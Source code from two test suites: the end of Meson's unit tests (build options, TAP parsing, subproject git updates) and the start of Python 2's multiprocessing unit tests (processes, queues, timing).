self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/dir'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.root_dir = Path(self.builddir)
self.project_dir = self.root_dir / 'src'
self._create_project(self.project_dir)
self.subprojects_dir = self.project_dir / 'subprojects'
os.makedirs(str(self.subprojects_dir))
def _create_project(self, path, project_name='dummy'):
os.makedirs(str(path), exist_ok=True)
with open(str(path / 'meson.build'), 'w') as f:
f.write("project('{}')".format(project_name))
def _git(self, cmd, workdir):
return git(cmd, str(workdir), check=True)[1].strip()
def _git_config(self, workdir):
self._git(['config', 'user.name', 'Meson Test'], workdir)
self._git(['config', 'user.email', 'meson.test@example.com'], workdir)
def _git_remote(self, cmd, name):
return self._git(cmd, self.root_dir / name)
def _git_local(self, cmd, name):
return self._git(cmd, self.subprojects_dir / name)
def _git_local_branch(self, name):
# Same as `git branch --show-current` but compatible with older git version
branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
return branch if branch != 'HEAD' else ''
def _git_local_commit(self, name, ref='HEAD'):
return self._git_local(['rev-parse', ref], name)
def _git_remote_commit(self, name, ref='HEAD'):
return self._git_remote(['rev-parse', ref], name)
def _git_create_repo(self, path):
self._create_project(path)
self._git(['init'], path)
self._git_config(path)
self._git(['add', '.'], path)
self._git(['commit', '-m', 'Initial commit'], path)
def _git_create_remote_repo(self, name):
self._git_create_repo(self.root_dir / name)
def _git_create_local_repo(self, name):
self._git_create_repo(self.subprojects_dir / name)
def _git_create_remote_commit(self, name, branch):
self._git_remote(['checkout', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_branch(self, name, branch):
self._git_remote(['checkout', '-b', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_tag(self, name, tag):
self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name)
self._git_remote(['tag', tag], name)
def _wrap_create_git(self, name, revision='master'):
path = self.root_dir / name
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-git]
url={}
revision={}
'''.format(os.path.abspath(str(path)), revision)))
def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
path = self.root_dir / tarball
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-file]
source_url={}
'''.format(os.path.abspath(str(path)))))
def _subprojects_cmd(self, args):
return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))
def test_git_update(self):
subp_name = 'sub1'
# Create a fake remote git repository and a wrap file. Checks that
# "meson subprojects download" works.
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
self._subprojects_cmd(['download'])
self.assertPathExists(str(self.subprojects_dir / subp_name))
self._git_config(self.subprojects_dir / subp_name)
# Create a new remote branch and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new branch.
self._git_create_remote_branch(subp_name, 'newbranch')
self._wrap_create_git(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch. Checks the new commit is pulled into existing
# local newbranch. Make sure it does not print spurious 'git stash' message.
self._git_create_remote_commit(subp_name, 'newbranch')
out = self._subprojects_cmd(['update', '--reset'])
self.assertNotIn('No local changes to save', out)
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch and switch to another branch. Checks that it
# switch current branch to newbranch and pull latest commit.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Stage some local changes then update. Checks that local changes got
# stashed.
self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
self._git_local(['add', '.'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
self.assertTrue(self._git_local(['stash', 'list'], subp_name))
# Create a new remote tag and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new tag in detached mode.
self._git_create_remote_tag(subp_name, 'newtag')
self._wrap_create_git(subp_name, 'newtag')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))
# Create a new remote commit and update the wrap file with the commit id.
# Checks that "meson subprojects update --reset" checkout the new commit
# in detached mode.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
self._wrap_create_git(subp_name, new_commit)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), new_commit)
@skipIfNoExecutable('true')
def test_foreach(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
self._git_create_local_repo('sub_git_no_wrap')
def ran_in(s):
ret = []
prefix = 'Executing command in '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
dummy_cmd = ['true']
out = self._subprojects_cmd(['foreach'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_file'])
out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_git'])
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def running_single_tests(argv, cases):
'''
Check whether we only got arguments for running individual tests, not
entire testcases, and not all testcases (no test args).
'''
got_test_arg = False
for arg in argv:
if arg.startswith('-'):
continue
for case in cases:
if not arg.startswith(case):
continue
if '.' not in arg:
# Got a testcase, done
return False
got_test_arg = True
return got_test_arg
def main():
unset_envs()
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests', 'SubprojectsCommandTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
# Don't use pytest-xdist when running single unit tests since it wastes
# time spawning a lot of processes to distribute tests to in that case.
if not running_single_tests(sys.argv, cases):
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# Fallback to plain unittest.
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
start = time.monotonic()
try:
raise SystemExit(main())
finally:
print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import Queue
import time
import sys
import os
import gc
import signal
import array
import socket
import random
import logging
import errno
from test import test_support
from StringIO import StringIO
_multiprocessing = test_support.import_module('_multiprocessing')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
# Work around broken sem_open implementations
test_support.import_module('multiprocessing.synchronize')
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = True
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
